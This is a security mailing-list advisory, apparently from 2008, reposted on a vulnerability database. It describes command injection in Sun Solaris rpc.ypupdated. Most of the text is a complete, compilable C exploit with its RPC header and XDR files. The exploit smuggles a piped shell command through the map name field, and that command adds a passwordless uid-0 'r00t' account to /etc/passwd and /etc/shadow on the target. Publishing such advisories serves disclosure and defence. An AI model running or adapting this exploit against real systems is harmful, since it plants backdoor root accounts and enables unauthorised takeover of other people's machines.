Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19484
HistoryMar 24, 2008 - 12:00 a.m.

[EXPL] Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)

2008-03-2400:00:00
vulners.com
42

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
http://www.securiteam.com

    • promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


Sun Solaris rpc.ypupdated Arbitrary Command Execution (Exploit)

SUMMARY

Insufficient filtering done on user provided input by the rpc.ypupdated
RPC process under the Sun Solaris operating system allows remote attackers
to cause the process to execute arbitrary commands.

DETAILS

Vulnerable Systems:

  • Sun Solaris 10

Exploit:
ypk.c:
/*update: kcope/year2008/tested on SunOS 5.10//

KEYSERV/YPUPDATED (SunOS 4.1.3/RPC SERVICES)

If we send an MAP UPDATE to a remote YPUPDATED (via KEYSERV)
it executes a shell through which extra commands may be launched
on the remote host by passing '|shell command'.

i.e. the COMM variable contains a pipe character after which a
command may be passed. You may change the command by changing this.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <rpc/rpc.h>

#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

typedef struct{
unsigned int yp_buf_len;
char * yp_buf_val;
} yp_buf;

struct ypupdate_args{
char * mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;

#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#elif STDC
extern bool_t xdr_ypupdate_args(XDR *,ypupdate_args *);
#else
bool_t xdr_ypupdate_args();
#endif

void main(argc, argv)
int argc;
char *argv[];
{

CLIENT * cli;

unsigned long prog=100028;
unsigned int vers=1;

struct sockaddr_in skn;
struct timeval timeVal;
struct hostent * hostEnt;

ypupdate_args ypArg;
unsigned long rtnval;

unsigned int desc;

char * comm = "|echo \"r00t::0:0:Super-User die zweite:/:/sbin/sh\" >>
/etc/passwd;echo \"r00t::6445::::::\" >> /etc/shadow;";

if(argc<2) {
printf("example: yxp target\n");
exit(1);
}

timeVal.tv_usec=0;
timeVal.tv_sec=15;
desc=RPC_ANYSOCK;

ypArg.datum.yp_buf_val="x";
ypArg.datum.yp_buf_len=strlen(ypArg.datum.yp_buf_val)+1;

ypArg.key.yp_buf_val="x";
ypArg.key.yp_buf_len=strlen(ypArg.key.yp_buf_val)+1;

ypArg.mapname=comm;

if ((hostEnt=gethostbyname(argv[1]))==NULL){
printf("gethostbyname failure\n");
exit(1);
}

skn.sin_family=AF_INET;skn.sin_port=htons(0);
bcopy(hostEnt->h_addr,&skn.sin_addr.s_addr,4);

if ((cli=clntudp_create(&skn,prog,vers,timeVal,&desc))==NULL){
printf("clntudp_create failure\n");
exit(1);
}

cli->cl_auth=authunix_create("localhost",0,0,0,0);

clnt_call(cli,1,xdr_ypupdate_args,&ypArg,xdr_u_int,&rtnval,timeVal);
}

ypupdate_prot.h:
/*

  • Please do not edit this file.
  • It was generated using rpcgen.
    */

#ifndef _YPUPDATE_PROT_H_RPCGEN
#define _YPUPDATE_PROT_H_RPCGEN

#include <rpc/rpc.h>

/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */

/*

  • Compiled from ypupdate_prot.x using rpcgen
  • This is NOT source code!
  • DO NOT EDIT THIS FILE!
    */
    #define MAXMAPNAMELEN 255
    #define MAXYPDATALEN 1023
    #define MAXERRMSGLEN 255

typedef struct {
u_int yp_buf_len;
char yp_buf_val;
} yp_buf;
#ifdef __cplusplus
extern "C" bool_t xdr_yp_buf(XDR , yp_buf);
#elif STDC
extern bool_t xdr_yp_buf(XDR , yp_buf);
#else /
Old Style C /
bool_t xdr_yp_buf();
#endif /
Old Style C */

struct ypupdate_args {
char mapname;
yp_buf key;
yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypupdate_args(XDR , ypupdate_args);
#elif STDC
extern bool_t xdr_ypupdate_args(XDR , ypupdate_args);
#else /
Old Style C /
bool_t xdr_ypupdate_args();
#endif /
Old Style C */

struct ypdelete_args {
char mapname;
yp_buf key;
};
typedef struct ypdelete_args ypdelete_args;
#ifdef __cplusplus
extern "C" bool_t xdr_ypdelete_args(XDR , ypdelete_args);
#elif STDC
extern bool_t xdr_ypdelete_args(XDR , ypdelete_args);
#else /
Old Style C /
bool_t xdr_ypdelete_args();
#endif /
Old Style C */

#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)

#ifdef __cplusplus
#define YPU_CHANGE ((u_long)1)
extern "C" u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern "C" u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern "C" u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern "C" u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern "C" u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern "C" u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);

#elif STDC
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_change_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_insert_1_svc(ypupdate_args *, struct svc_req *);
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1(ypdelete_args *, CLIENT *);
extern u_int * ypu_delete_1_svc(ypdelete_args *, struct svc_req *);
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1(ypupdate_args *, CLIENT *);
extern u_int * ypu_store_1_svc(ypupdate_args *, struct svc_req *);

#else /* Old Style C /
#define YPU_CHANGE ((u_long)1)
extern u_int * ypu_change_1();
extern u_int * ypu_change_1_svc();
#define YPU_INSERT ((u_long)2)
extern u_int * ypu_insert_1();
extern u_int * ypu_insert_1_svc();
#define YPU_DELETE ((u_long)3)
extern u_int * ypu_delete_1();
extern u_int * ypu_delete_1_svc();
#define YPU_STORE ((u_long)4)
extern u_int * ypu_store_1();
extern u_int * ypu_store_1_svc();
#endif /
Old Style C */

#endif /* !_YPUPDATE_PROT_H_RPCGEN */

ypupdate_prot_xdr.c:
/*

  • Please do not edit this file.
  • It was generated using rpcgen.
    */

#include "ypupdate_prot.h"
/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */

/*

  • Compiled from ypupdate_prot.x using rpcgen
  • This is NOT source code!
  • DO NOT EDIT THIS FILE!
    */

bool_t
xdr_yp_buf(XDR *xdrs, yp_buf *objp)
{

register long *buf;

if (!xdr_bytes(xdrs, (char **)&objp->yp_buf_val, (u_int
*)&objp->yp_buf_len, MAXYPDATALEN)) {
return (FALSE);
}
return (TRUE);
}

bool_t
xdr_ypupdate_args(XDR *xdrs, ypupdate_args *objp)
{

register long *buf;

if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->datum)) {
return (FALSE);
}
return (TRUE);
}

bool_t
xdr_ypdelete_args(XDR *xdrs, ypdelete_args *objp)
{

register long *buf;

if (!xdr_string(xdrs, &objp->mapname, MAXMAPNAMELEN)) {
return (FALSE);
}
if (!xdr_yp_buf(xdrs, &objp->key)) {
return (FALSE);
}
return (TRUE);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:[email protected]> kcope.
The original article can be found at:
<http://www.milw0rm.com/exploits/5282&gt;
http://www.milw0rm.com/exploits/5282

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of
business profits or special damages.